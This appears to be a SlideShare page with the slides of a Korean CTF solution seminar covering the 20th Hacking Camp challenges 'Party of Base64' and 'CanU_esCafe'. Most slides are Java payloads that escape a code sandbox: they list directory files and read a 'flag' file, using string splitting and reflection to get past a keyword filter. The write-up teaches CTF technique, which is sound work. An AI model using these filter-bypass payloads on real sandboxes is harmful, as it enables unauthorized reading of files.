Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

20회 해킹캠프 CTF 문제 풀이 세미나 - Party of Base64, CanU_esCafe

10 views

Published on

20회 해킹캠프 CTF 문제 풀이 세미나에서 Party of Base64와 블라인드로 푼 CanU_esCafe의 풀이를 소개했습니다.

Published in: Technology
  • Be the first to comment

  • Be the first to like this

20회 해킹캠프 CTF 문제 풀이 세미나 - Party of Base64, CanU_esCafe

  1. 1. 5버플로우 9초전(양희성)
  2. 2. 5버플로우 9초전(양희성)
  3. 3. 누가 파일 안주는 바람에 블라인드로 품
  4. 4. for(java.io.File file :new java.io.File("./").listFiles()) { System.out.println(file.getName()); }
  5. 5. for(java.io.File file :new java.io.File("./").listFiles()) { System.out.println(file.getName()); }
  6. 6. for(Stringstr:java.nio.file.Files.readAllLines(java.nio.file.Paths.get("./flag"))){ System.out.println(str); }
  7. 7. for(Stringstr:java.nio.file.Files.readAllLines(java.nio.file.Paths.get("./flag"))){ System.out.println(str); }
  8. 8. try{ System.out.println(java.nio.file.Files.readAllLines(java.nio.file.Paths.get("./fl"+"ag")).get(0)); }catch(Exception e){}
  9. 9. try{ System.out.println(java.nio.file.Files.readAllLines(java.nio.file.Paths.get("./fl"+"ag")).get(0)); }catch(Exception e){}
  10. 10. try{ Class.forName("es"+"cape").getDeclaredMethod("gogo", newClass[]{}).invoke(new Object[]{}); }catch(Exception e) {} } @SuppressWarnings("unchecked") private static void gogo() throwsException { Class clazz = Class.forName("java.io.FileRe"+"ader"); Class[] types = {java.io.File.class}; Object[] values = {newjava.io.File("fl"+"ag")}; Object obj = clazz.getDeclaredConstructor(types).newInstance(values); int ch; while ((ch = (int) clazz.getMethod("read", new Class[]{}).invoke(obj)) != -1){ System.out.print((char) ch); }
  11. 11. try{ Class.forName("es"+"cape").getDeclaredMethod("gogo", newClass[]{}).invoke(new Object[]{}); }catch(Exception e) {} } @SuppressWarnings("unchecked") private static void gogo() throwsException { Class clazz2 = Class.forName("java.io.Fi"+"le"); Class[] types2 = {String.class}; Object[] values2 = {"fl"+"ag"}; Object f = clazz2.getDeclaredConstructor(types2).newInstance(values2); Class clazz = Class.forName("java.io.Fi"+"leRe"+"ader"); Class[] types = {clazz2}; Object[] values = {f}; Object obj = clazz.getDeclaredConstructor(types).newInstance(values); int ch; while ((ch = (int) clazz.getMethod("read", new Class[]{}).invoke(obj)) != -1){ System.out.print((char) ch); }
  12. 12. 20000 https://blog.devonnuri.com

×